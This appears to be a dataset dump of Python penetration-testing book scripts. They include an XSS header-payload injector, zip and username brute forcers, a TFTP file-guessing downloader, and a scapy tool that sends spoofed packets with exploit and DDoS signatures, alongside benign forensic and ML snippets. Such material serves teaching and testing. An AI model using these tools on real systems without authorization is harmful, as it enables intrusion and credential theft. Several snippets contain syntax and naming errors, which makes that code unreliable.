repo_name
stringclasses 29
values | text
stringlengths 18
367k
| avg_line_length
float64 5.6
132
| max_line_length
int64 11
3.7k
| alphnanum_fraction
float64 0.28
0.94
|
---|---|---|---|---|
cybersecurity-penetration-testing | import requests
import sys
url = sys.argv[1]
payload = ['<script>alert(1);</script>', '<scrscriptipt>alert(1);</scrscriptipt>', '<BODY ONLOAD=alert(1)>']
headers ={}
r = requests.head(url)
for payload in payloads:
for header in r.headers:
headers[header] = payload
req = requests.post(url, headers=headers)
| 27.636364 | 108 | 0.697452 |
Mastering-Machine-Learning-for-Penetration-Testing | # Display "Hello, world!"
import tensorflow as tf
Message = tf.constant("Hello, world!")
sess = tf.Session()
print(sess.run(Message))
| 21.5 | 38 | 0.716418 |
Effective-Python-Penetration-Testing | import zipfile
filename = 'test.zip'
dictionary = 'passwordlist.txt'
password = None
file_to_open = zipfile.ZipFile(filename)
with open(dictionary, 'r') as f:
for line in f.readlines():
password = line.strip('\n')
try:
file_to_open.extractall(pwd=password)
password = 'Password found: %s' % password
print password
except:
pass | 20.8125 | 45 | 0.698276 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: April 2015
tftp_download.py
Purpose: To run through a range of possible files and try and download them over TFTP.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
try:
import tftpy
except:
sys.exit(“[!] Install the package tftpy with: pip install tftpy”)
def main():
ip = "192.168.195.165"
port = 69
tclient = tftpy.TftpClient(ip,port)
for inc in range(0,100):
filename = "example_router" + "-" + str(inc)
print("[*] Attempting to download %s from %s:%s") % (filename,ip,port)
try:
tclient.download(filename,filename)
except:
print("[-] Failed to download %s from %s:%s") % (filename,ip,port)
if __name__ == '__main__':
main()
| 44.625 | 89 | 0.742348 |
Effective-Python-Penetration-Testing | # Importing required modules
import requests
from bs4 import BeautifulSoup
import urlparse
response = requests.get('http://www.freeimages.co.uk/galleries/food/breakfast/index.htm')
parse = BeautifulSoup(response.text)
# Get all image tags
image_tags = parse.find_all('img')
# Get urls to the images
images = [ url.get('src') for url in image_tags]
# If no images found in the page
if not images:
sys.exit("Found No Images")
# Convert relative urls to absolute urls if any
images = [urlparse.urljoin(response.url, url) for url in images]
print 'Found %s images' % len(images)
# Download images to downloaded folder
for url in images:
r = requests.get(url)
f = open('downloaded/%s' % url.split('/')[-1], 'w')
f.write(r.content)
f.close()
print 'Downloaded %s' % url
| 24.28125 | 91 | 0.694307 |
cybersecurity-penetration-testing |
'''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Forensic File Processing, Hashing and Image Rendering
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 March 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
import time # Basic Time Module
import logging # Script Logging
import hashlib # Cryptographic Hashing
import argparse # Command Line Processing Module
# Import 3rd Party Modules
from PIL import Image
# End of Script Module Importing
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: Forensic Script Two SRC-2-2.py"
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_LOG = "./FORENSIC_LOG.txt"
# LOG Constants used as input to LogEvent Function
LOG_DEBUG = 0 # Debugging Event
LOG_INFO = 1 # Information Event
LOG_WARN = 2 # Warning Event
LOG_ERR = 3 # Error Event
LOG_CRIT = 4 # Critical Event
LOG_OVERWRITE = True # Set this contstant to True if the SCRIPT_LOG
# should be overwritten, False if not
# End of Script Constants
# Initialize the Forensic Log
try:
# If LOG should be overwritten before
# each run, the remove the old log
if LOG_OVERWRITE:
# Verify that the log exists before removing
if os.path.exists(SCRIPT_LOG):
os.remove(SCRIPT_LOG)
# Initialize the Log include the Level and message
logging.basicConfig(filename=SCRIPT_LOG, format='%(levelname)s\t:%(message)s', level=logging.DEBUG)
except:
print "Failed to initialize Logging"
quit()
# End of Forensic Log Initialization
# Script Functions
'''
If you script will contain functions then insert them
here, before the execution of the main script. This
will ensure that the functions will be callable from
anywhere in your script
'''
# Function: GetTime()
#
# Returns a string containing the current time
#
# Script will use the local system clock, time, date and timezone
# to calcuate the current time. Thus you should sync your system
# clock before using this script
#
# Input: timeStyle = 'UTC', 'LOCAL', the function will default to
# UTC Time if you pass in nothing.
def GetTime(timeStyle = "UTC"):
if timeStyle == 'UTC':
return ('UTC Time: ', time.asctime(time.gmtime(time.time())))
else:
return ('LOC Time: ', time.asctime(time.localtime(time.time())))
# End GetTime Function ============================
# Function: LogEvent()
#
# Logs the event message and specified type
# Input:
# eventType: LOG_INFO, LOG_WARN, LOG_ERR, LOG_CRIT or LOG_DEBUG
# eventMessage : string containing the message to be logged
def LogEvent(eventType, eventMessage):
if type(eventMessage) == str:
try:
timeStr = GetTime('UTC')
# Combine current Time with the eventMessage
# You can specify either 'UTC' or 'LOCAL'
# Based on the GetTime parameter
eventMessage = str(timeStr)+": "+eventMessage
if eventType == LOG_INFO:
logging.info(eventMessage)
elif eventType == LOG_DEBUG:
logging.debug(eventMessage)
elif eventType == LOG_WARN:
logging.warning(eventMessage)
elif eventType == LOG_ERR:
logging.error(eventMessage)
elif eventType == LOG_CRIT:
logging.critical(eventMessage)
else:
logging.info(eventMessage)
except:
print "Event Logging Failed"
else:
logging.warn('Received invalid event message')
# End LogEvent Function =========================
#
# Name: ParseCommandLine() Function
#
# Process and Validate the command line arguments
# using the Python Standard Library module argparse
#
# Input: none
#
# Return: validated filePath and hashType
# or generate a detailed error
def ParseCommandLine():
parser = argparse.ArgumentParser(SCRIPT_NAME)
parser.add_argument('-p', '--scanPath', type= ValPath, required=True, help="specifies the file path to scan")
parser.add_argument('-t', '--hashType', type= ValHash, required=True, help="enter hashType MD5, SHA1, SH224, SHA256, SHA384 or SHA512")
theArgs = parser.parse_args()
return theArgs.scanPath, theArgs.hashType
# End ParseCommandLine ============================
#
# Name: ValidatePath Function
#
# Function validates validate a directory path
# exists and readable. Used for argument validation only
#
# Input: a directory path string
#
# Returns the validated directory
# or raises command line errors
#
def ValPath(thePath):
# Validate the path is a directory
if not os.path.isdir(thePath):
raise argparse.ArgumentTypeError('Path does not exist')
# Validate the path is readable
if os.access(thePath, os.R_OK):
return thePath
else:
raise argparse.ArgumentTypeError('Path is not readable')
#End ValidateDirectory ===================================
#
# Name: ValHash Type Function
#
# Function validates the entered hash string
#
# Input: HashType
#
# Returns the validated hashType upper case
# or raises command line errors
#
def ValHash(theAlg):
theAlg = theAlg.upper()
if theAlg in ['MD5', 'SHA1', 'SHA224', 'SHA256', 'SHA384', 'SHA512']:
return theAlg
else:
raise argparse.ArgumentTypeError('Invalid Hash Type Specified')
#End ValHash ===============================
# End of Script Functions
# Script Classes
# Class: FileExaminer Class
#
# Desc: Handles basic File Based Examination
# Methods constructor: Initializes the Forensic File Object and Collects Basic Attributes
# File Size
# MAC Times
# Reads file into a buffer
# hashFile: Generates the selected one-way hash of the file
# destructor: Deletes the Forensic File Object
class FileExaminer:
# Constructor
def __init__(self, theFile):
#Attributes of the Object
self.lastError = "OK"
# Modified Access Create Time
self.mactimes = ["","",""]
filename, self.fileExtension = os.path.splitext(theFile)
# File Status Data
self.filePath = theFile
self.mode = 0
self.fileSize = 0
self.fileType = "unknown"
self.uid = 0
self.gid = 0
self.mountPoint = False
self.fileRead = False
# Possible Hashes
self.md5 = ""
self.sha1 = ""
self.sha224 = ""
self.sha256 = ""
self.sha384 = ""
self.sha512 = ""
self.lastHash = ""
# Image data (if file is and image)
self.imageHeight = 0
self.imageWidth = 0
self.imageFormat = ''
self.imageFormatDesc = ''
self.imageExif = ''
try:
if os.path.exists(theFile):
# get the file statistics
theFileStat = os.stat(theFile)
# get the MAC Times and store them in a list
self.macTimes = []
self.macTimes.append(time.ctime(theFileStat.st_mtime))
self.macTimes.append(time.ctime(theFileStat.st_atime))
self.macTimes.append(time.ctime(theFileStat.st_ctime))
self.mode = theFileStat.st_mode
# get and store the File size
self.fileSize = theFileStat.st_size
# Get and store the ownership information
self.uid = theFileStat.st_uid
self.gid = theFileStat.st_gid
if os.path.isfile(theFile):
self.fileType = "File"
# Is this a real file?
elif os.path.islink(theFile):
self.fileType = "Link"
# Is This filename actually a directory?
elif os.path.isdir(theFile):
self.fileType = "Directory"
else:
self.fileType = "Unknown"
# Is the pathname a mount point?
if os.path.ismount(theFile):
self.mountPoint = True
else:
self.mountPoint = False
# Is the file Accessible for Read?
if os.access(theFile, os.R_OK) and self.fileType == "File":
# Open the file
fp = open(theFile, 'rb')
# Assume we have enough space
self.buffer = fp.read()
# Close the file we have the entire file in memory
fp.close()
self.fileRead = True
else:
self.fileRead = False
else:
self.lastError = "File does not exist"
except:
self.lastError = "File Exception Raised"
LogEvent(LOG_ERR, "File Examiner - Failed to Process File: " + theFile)
# Hash file method
def hashFile(self,hashType):
try:
if hashType == "MD5":
hashObj = hashlib.md5()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.md5 = self.lastHash
self.lastHash
self.lastError = "OK"
return True
elif hashType == "SHA1":
hashObj = hashlib.sha1()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha1 = self.lastHash
self.lastError = "OK"
return True
if hashType == "SHA224":
hashObj = hashlib.sha224()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha224 = self.lastHash
self.lastError = "OK"
return True
elif hashType == "SHA256":
hashObj = hashlib.sha256()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha256 = self.lastHash
self.lastError = "OK"
return True
if hashType == "SHA384":
hashObj = hashlib.sha384()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha384 = self.lastHash
self.lastError = "OK"
return True
elif hashType == "SHA512":
hashObj = hashlib.sha512()
hashObj.update(self.buffer)
self.lastHash = hashObj.hexdigest().upper()
self.sha512 = self.lastHash
self.lastError = "OK"
return True
else:
self.lastError = "Invalid Hash Type Specified"
return False
except:
self.lastError = "File Hash Failure"
LogEvent(LOG_ERR, "File Hashing - Failed to Hash File")
return False
def ExtractImageProperties(self):
try:
image = Image.open(self.filePath)
self.imageHeight = image.height
self.imageWidth = image.width
self.imageFormat = image.format
self.imageFormatDesc = image.format_description
if self.imageFormat == 'JPEG':
self.imageExif = image._getexif()
return True
except:
self.lastError = "Error Processing Image Data"
LogEvent(LOG_ERR, "Error Processing Image Data")
return False
def __del__(self):
print
# End Forensic File Class ====================================
# End of Script Classes
# Main Script Starts Here
#
# Script Overview
#
# The purpose of this script it to provide an example
# script that demonstrate and leverage key capabilities
# of Python that provides direct value to the
# forensic investigator.
# This script will perform the following:
#
# 1) Process the command line and obtain the filePath and hashType
# 2) The file names will be stored in a Python List object
# 3) for each file encountered meta-data will be extracted
# and each file will be hashed with the selected algorithm.
# the results will be written to the log file.
LogEvent(LOG_INFO, SCRIPT_NAME)
LogEvent(LOG_INFO, SCRIPT_VERSION)
LogEvent(LOG_INFO, "Script Started")
# Print Basic Script Information
print SCRIPT_NAME
print SCRIPT_VERSION
print SCRIPT_AUTHOR
utcTime = GetTime()
print "Script Started: ", utcTime
print
#
# STEP One:
# Parse the Command Line Arguments
#
thePath, theAlg = ParseCommandLine()
print "Path Selected: ", thePath
LogEvent(LOG_INFO, "Path Selected: "+thePath)
print "Algorithm Selected:", theAlg
LogEvent(LOG_INFO,"Algorithm Selected: "+ theAlg)
#
# Step Two extract a list of filenames
# from the path specified
#
listOfFiles = os.listdir(thePath)
#
# Step Three Extract the basic metadata and
# specified file hash of the each file
# using the FileExaminer Class
#
for eachFile in listOfFiles:
# Utilize a try except loop in case encounter
# Errors during file processing
try:
# join the path and file name
fullPath = os.path.join(thePath, eachFile)
# create a file examiner object
feObj = FileExaminer(fullPath)
# generate the specified hash
if feObj.hashFile(theAlg):
print "Hashing Success"
else:
print "Hashing Failed"
# Extract image properties if file is an image
if feObj.ExtractImageProperties():
imageData = True
print "Image Properties Extracted"
else:
imageData = False
print "Image Property Extraction Failed"
LogEvent(LOG_INFO, "============================================")
LogEvent(LOG_INFO, "File Processed: "+ fullPath)
LogEvent(LOG_INFO, "File Extension: "+ feObj.fileExtension)
LogEvent(LOG_INFO, "File Modified: "+ feObj.macTimes[0])
LogEvent(LOG_INFO, "File Accessed: "+ feObj.macTimes[1])
LogEvent(LOG_INFO, "File Created: "+ feObj.macTimes[2])
LogEvent(LOG_INFO, "File Size: "+ str(feObj.fileSize))
LogEvent(LOG_INFO, "File Hash: "+ theAlg + ":" + feObj.lastHash)
LogEvent(LOG_INFO, "File Owner: "+ str(feObj.uid))
LogEvent(LOG_INFO, "File Group: "+ str(feObj.gid))
LogEvent(LOG_INFO, "File Mode: "+ bin(feObj.mode))
if imageData:
LogEvent(LOG_INFO, "Image Format: "+ feObj.imageFormat)
LogEvent(LOG_INFO, "Image Format Desc "+ feObj.imageFormatDesc)
LogEvent(LOG_INFO, "Image Width Pixels: "+ str(feObj.imageWidth))
LogEvent(LOG_INFO, "Image Height Pixels: "+ str(feObj.imageHeight))
print "=================================================="
print "File Processed: ", fullPath
print "File Ext: ", feObj.fileExtension
print "MAC Times: ", feObj.macTimes
print "File Size: ", feObj.fileSize
print "File Hash: ", theAlg, feObj.lastHash
print "File Owner: ", feObj.uid
print "File Group: ", feObj.gid
print "File Mode: ", bin(feObj.mode)
print
if imageData:
print "Image Properties"
print "Image Format: ", feObj.imageFormat
print "Image Format Desc ", feObj.imageFormatDesc
print "Image Width Pixels: ", feObj.imageWidth
print "Image Height Pixels: ", feObj.imageHeight
if feObj.imageFormat == "JPEG":
print "Exif Raw Data: ", feObj.imageExif
except:
print "File Processing Error: ", fullPath
LogEvent(LOG_INFO, "File Processing Error: "+ fullPath)
print
print "Files Processing Completed"
LogEvent(LOG_INFO, "Script End")
utcTime = GetTime('UTC')
print "Script Ended: ", utcTime
# End of Script Main
| 30.707106 | 143 | 0.55111 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Simple script for making "Copy as curl command" output in system's clipboard a little nicer\
# To use it:
# - firstly right click on request in BurpSuite
# - select "Copy as curl command"
# - then launch this script.
# As a result, you'll have a bit nicer curl command in your clipboard.
#
try:
import xerox
except ImportError:
raise ImportError, "`xerox` library not found. Install it using: `pip install xerox`"
import re
data = xerox.paste()
data = re.sub(r"\s+\\\n\s+", ' ', data, re.M)
data = re.sub('curl -i -s -k\s+-X', 'curl -iskX', data)
if "-iskX 'GET'" in data:
data = data.replace("-iskX 'GET'", '')
else:
data = re.sub(r"-iskX '([^']+)' ", r"-iskX \1 ", data)
superfluous_headers = {
'Upgrade-Insecure-Requests':'',
'DNT':'',
'User-Agent':'',
'Content-Type':"application/x-www-form-urlencoded",
'Referer':'',
}
for k, v in superfluous_headers.items():
val = v
if not val:
val = "[^']+"
rex = r" -H '" + k + ": " + val + "' "
m = re.search(rex, data)
if m:
data = re.sub(rex, ' ', data)
data = re.sub(r"'(http[^']+)'$", r'"\1"', data)
xerox.copy(data) | 24.272727 | 94 | 0.612961 |
Python-Penetration-Testing-for-Developers | import threading
import time
import socket, subprocess,sys
from datetime import datetime
import thread
import shelve
'''section 1 '''
subprocess.call('clear',shell=True)
shelf = shelve.open("mohit.raj")
data=(shelf['desc'])
#shelf.sync()
'''section 2 '''
class myThread (threading.Thread):
def __init__(self, threadName,rmip,r1,r2,c):
threading.Thread.__init__(self)
self.threadName = threadName
self.rmip = rmip
self.r1 = r1
self.r2 = r2
self.c =c
def run(self):
scantcp(self.threadName,self.rmip,self.r1,self.r2,self.c)
'''section 3 '''
def scantcp(threadName,rmip,r1,r2,c):
try:
for port in range(r1,r2):
sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#sock= socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
socket.setdefaulttimeout(c)
result = sock.connect_ex((rmip,port))
if result==0:
print "Port Open:---->\t", port,"--", data.get(port, "Not in Database")
sock.close()
except KeyboardInterrupt:
print "You stop this "
sys.exit()
except socket.gaierror:
print "Hostname could not be resolved"
sys.exit()
except socket.error:
print "could not connect to server"
sys.exit()
shelf.close()
'''section 4 '''
print "*"*60
print " \tWelcome this is the Port scanner of Mohit\n "
d=raw_input("\t Press D for Domain Name or Press I for IP Address\t")
if (d=='D' or d=='d'):
rmserver = raw_input("\t Enter the Domain Name to scan:\t")
rmip = socket.gethostbyname(rmserver)
elif(d=='I' or d=='i'):
rmip = raw_input("\t Enter the IP Address to scan: ")
else:
print "Wrong input"
#rmip = socket.gethostbyname(rmserver)
r11 = int(raw_input("\t Enter the start port number\t"))
r21 = int (raw_input("\t Enter the last port number\t"))
conect=raw_input("For low connectivity press L and High connectivity Press H\t")
if (conect=='L' or conect=='l'):
c =1.5
elif(conect =='H' or conect=='h'):
c=0.5
else:
print "\t wrong Input"
print "\n Mohit's Scanner is working on ",rmip
print "*"*60
t1= datetime.now()
tp=r21-r11
tn =30
# tn number of port handled by one thread
tnum=tp/tn # tnum number of threads
if (tp%tn != 0):
tnum= tnum+1
if (tnum > 300):
tn = tp/300
tn= tn+1
tnum=tp/tn
if (tp%tn != 0):
tnum= tnum+1
'''section 5'''
threads= []
try:
for i in range(tnum):
#print "i is ",i
k=i
r2=r11+tn
# thread=str(i)
thread = myThread("T1",rmip,r11,r2,c)
thread.start()
threads.append(thread)
r11=r2
except:
print "Error: unable to start thread"
print "\t Number of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total
print "\n*****Thanks for using Mohit's Port Scanner****"
print "You can update database file"
print "use command python > python updata.py"
print "Give feedback to mohitraj.cs@gmail.com"
| 23.160305 | 87 | 0.604298 |
owtf | """
GREP Plugin for Testing for application configuration management (OWASP-CM-004) <- looks for HTML Comments
https://www.owasp.org/index.php/Testing_for_application_configuration_management_%28OWASP-CM-004%29
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for comments"
def run(PluginInfo):
regexes = [
"RESPONSE_REGEXP_FOR_HTML_COMMENTS",
"RESPONSE_REGEXP_FOR_CSS_JS_COMMENTS",
"RESPONSE_REGEXP_FOR_JS_COMMENTS",
"RESPONSE_REGEXP_FOR_PHP_SOURCE",
"RESPONSE_REGEXP_FOR_ASP_SOURCE",
]
Content = plugin_helper.FindResponseBodyMatchesForRegexpNames(regexes)
return Content
| 35.428571 | 106 | 0.734293 |
cybersecurity-penetration-testing | #brute force username enumeration
import sys
import urllib
import urllib2
if len(sys.argv) !=2:
print "usage: %s filename" % (sys.argv[0])
sys.exit(0)
filename=str(sys.argv[1])
userlist = open(filename,'r')
url = "http://www.vulnerablesite.com/forgotpassword.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
user=user.rstrip()
data = urllib.urlencode({"username":user})
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(UnknownStr)>=0)
foundusers.append(user)
request.close()
if len(foundusers)>0:
print "Found Users:\n"
for name in foundusers:
print name+"\n"
else:
print "No users found\n"
| 19.484848 | 57 | 0.712593 |
cybersecurity-penetration-testing | '''
Copyright (c) 2016 Chet Hosmer
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
Script Purpose: Python Template for MPE+ Integration
Script Version: 1.0
Script Author: C.Hosmer
Script Revision History:
Version 1.0 April 2016
'''
# Script Module Importing
# Python Standard Library Modules
import os # Operating/Filesystem Module
from sys import argv # The systems argument vector, in Python this is
# a list of elements from the command line
# Script Constants
'''
Python does not support constants directly
however, by initializing variables here and
specifying them as UPPER_CASE you can make your
intent known
'''
# General Constants
SCRIPT_NAME = "Script: MPE+ Command Line Arguments"
SCRIPT_VERSION = "Version 1.0"
SCRIPT_AUTHOR = "Author: C. Hosmer, Python Forensics"
SCRIPT_RELEASE = "April 2016"
# Print out some basics
print(SCRIPT_NAME)
print(SCRIPT_AUTHOR)
print(SCRIPT_VERSION, SCRIPT_RELEASE)
# Obtain the command line arguments using
# the system argument vector
# For MPE+ Scripts the length of the argument vector is
# always 2 scriptName, path
if len(argv) == 2:
scriptName, path = argv
else:
print(argv, "Invalid Command line")
quit()
print("Command Line Argument Vector")
print("Script Name: ", scriptName)
print("Script Path: ", path)
# Verify the path exists and determine
# the path type
if os.path.exists(path):
print("Path Exists")
if os.path.isdir(path):
print("Path is a directory")
elif os.path.isfile(path):
print("Path is a file")
else:
print(path, "is invalid")
else:
print(path, "Does not exist")
print ("Script Complete") | 28.141026 | 103 | 0.702905 |
Python-Penetration-Testing-for-Developers | import subprocess
import sys
ipfile = sys.argv[1]
IPs = open(ipfile, "r")
output = open("sslscan.csv", "w+")
for IP in IPs:
try:
command = "sslscan "+IP
ciphers = subprocess.check_output(command.split())
for line in ciphers.splitlines():
if "Accepted" in line:
output.write(IP+","+line.split()[1]+","+line.split()[4]+","+line.split()[2]+"\r")
except:
pass | 18.947368 | 85 | 0.632275 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Mastering-Machine-Learning-for-Penetration-Testing | import pandas as pd
import yellowbrick as yb
from sklearn.model_selection import train_test_split
from sklearn import preprocessing
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import train_test_split
Columns = ["duration","protocol_type","service","flag","src_bytes",
"dst_bytes","land","wrong_fragment","urgent","hot","num_failed_logins",
"logged_in","num_compromised","root_shell","su_attempted","num_root",
"num_file_creations","num_shells","num_access_files","num_outbound_cmds",
"is_host_login","is_guest_login","count","srv_count","serror_rate",
"srv_serror_rate","rerror_rate","srv_rerror_rate","same_srv_rate",
"diff_srv_rate","srv_diff_host_rate","dst_host_count","dst_host_srv_count",
"dst_host_same_srv_rate","dst_host_diff_srv_rate","dst_host_same_src_port_rate",
"dst_host_srv_diff_host_rate","dst_host_serror_rate","dst_host_srv_serror_rate",
"dst_host_rerror_rate","dst_host_srv_rerror_rate","label","difficulty"]
Data = pd.read_csv("KDDTrain+.csv", header=None, names = Columns)
Data.protocol_type = preprocessing.LabelEncoder().fit_transform(Data["protocol_type"])
Data.service = preprocessing.LabelEncoder().fit_transform(Data["service"])
Data.flag = preprocessing.LabelEncoder().fit_transform(Data["flag"])
Data.label = preprocessing.LabelEncoder().fit_transform(Data["label"])
X = Data[Columns].as_matrix()
y = Data.label.as_matrix()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
clf = RandomForestClassifier(max_depth=2, random_state=0)
clf.fit(X, y)
Score = clf.score(X_test,y_test)
print(Score*100)
| 42 | 86 | 0.720147 |
Python-Penetration-Testing-for-Developers | import socket
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "192.168.0.1"
port =12347
s.connect((host,port))
msg= s.recv(1024)
print msg
print struct.unpack('hhl',msg)
s.close() | 19.8 | 53 | 0.729469 |
Mastering-Machine-Learning-for-Penetration-Testing | import pandas as pd
import numpy as np
data = np.array(['p','a','c','k',’t’])
SR = pd.Series(data)
print SR
| 17.166667 | 38 | 0.62963 |
owtf | """
owtf.utils.commands
~~~~~~~~~~~~~~~~~~~
"""
import os
def get_command(argv):
"""Format command to remove directory and space-separated arguments.
:params list argv: Arguments for the CLI.
:return: Arguments without directory and space-separated arguments.
:rtype: list
"""
return " ".join(argv).replace(argv[0], os.path.basename(argv[0]))
| 17.75 | 72 | 0.644385 |
cybersecurity-penetration-testing | import optparse
from scapy.all import *
from random import randint
def ddosTest(src, dst, iface, count):
pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/Raw(load='1234')
send(pkt, iface=iface, count=count)
pkt = IP(src=src,dst=dst)/ICMP(type=0)/Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src,dst=dst)/UDP(dport=31335)/Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456)
send(pkt, iface=iface, count=count)
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) \
/Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) \
/Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) \
/Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) \
/Raw(load='Amanda')
send(pkt, iface=iface, count=count)
def main():
parser = optparse.OptionParser('usage %prog '+\
'-i <iface> -s <src> -t <target> -c <count>'
)
parser.add_option('-i', dest='iface', type='string',\
help='specify network interface')
parser.add_option('-s', dest='src', type='string',\
help='specify source address')
parser.add_option('-t', dest='tgt', type='string',\
help='specify target address')
parser.add_option('-c', dest='count', type='int',\
help='specify packet count')
(options, args) = parser.parse_args()
if options.iface == None:
iface = 'eth0'
else:
iface = options.iface
if options.src == None:
src = '.'.join([str(randint(1,254)) for x in range(4)])
else:
src = options.src
if options.tgt == None:
print parser.usage
exit(0)
else:
dst = options.tgt
if options.count == None:
count = 1
else:
count = options.count
ddosTest(src, dst, iface, count)
exploitTest(src, dst, iface, count)
scanTest(src, dst, iface, count)
if __name__ == '__main__':
main()
| 27.135802 | 65 | 0.588235 |
owtf | """
owtf.models.error
~~~~~~~~~~~~~~~~~
"""
from owtf.lib.exceptions import InvalidErrorReference
from sqlalchemy import Boolean, Column, Integer, String
from owtf.db.model_base import Model
from owtf.db.session import flush_transaction
class Error(Model):
__tablename__ = "errors"
id = Column(Integer, primary_key=True)
owtf_message = Column(String)
traceback = Column(String, nullable=True)
user_message = Column(String, nullable=True)
reported = Column(Boolean, default=False)
github_issue_url = Column(String, nullable=True)
def __repr__(self):
return "<Error (traceback='{!s}')>".format(self.traceback)
@classmethod
def add_error(cls, session, message, trace):
obj = Error(owtf_message=message, traceback=trace)
session.add(obj)
session.commit()
return obj.to_dict()
@classmethod
def get_error(cls, session, error_id):
error = session.query(Error).get(error_id)
if not error: # If invalid error id, bail out
raise InvalidErrorReference("No error with id {!s}".format(error_id))
return error.to_dict()
@classmethod
def delete_error(cls, session, id):
error = session.query(cls).get(id)
if error:
session.delete(error)
session.commit()
else:
raise InvalidErrorReference("No error with id {!s}".format(id))
def to_dict(self):
obj = dict(self.__dict__)
obj.pop("_sa_instance_state", None)
return obj
@classmethod
def get_all_dict(cls, session):
errors = session.query(Error).all()
result = []
for err in errors:
result.append(err.to_dict())
return result
@classmethod
def update_error(cls, session, error_id, user_message):
obj = session.query(Error).filter(id=error_id)
if not obj: # If invalid error id, bail out
raise InvalidErrorReference("No error with id {!s}".format(error_id))
obj.user_message = user_message
session.merge(obj)
session.commit()
| 29.014286 | 81 | 0.619524 |
cybersecurity-penetration-testing | # Transposition Cipher Encrypt/Decrypt File
# http://inventwithpython.com/hacking (BSD Licensed)
import time, os, sys, transpositionEncrypt, transpositionDecrypt
def main():
inputFilename = 'frankenstein.txt'
# BE CAREFUL! If a file with the outputFilename name already exists,
# this program will overwrite that file.
outputFilename = 'frankenstein.encrypted.txt'
myKey = 10
myMode = 'encrypt' # set to 'encrypt' or 'decrypt'
# If the input file does not exist, then the program terminates early.
if not os.path.exists(inputFilename):
print('The file %s does not exist. Quitting...' % (inputFilename))
sys.exit()
# If the output file already exists, give the user a chance to quit.
if os.path.exists(outputFilename):
print('This will overwrite the file %s. (C)ontinue or (Q)uit?' % (outputFilename))
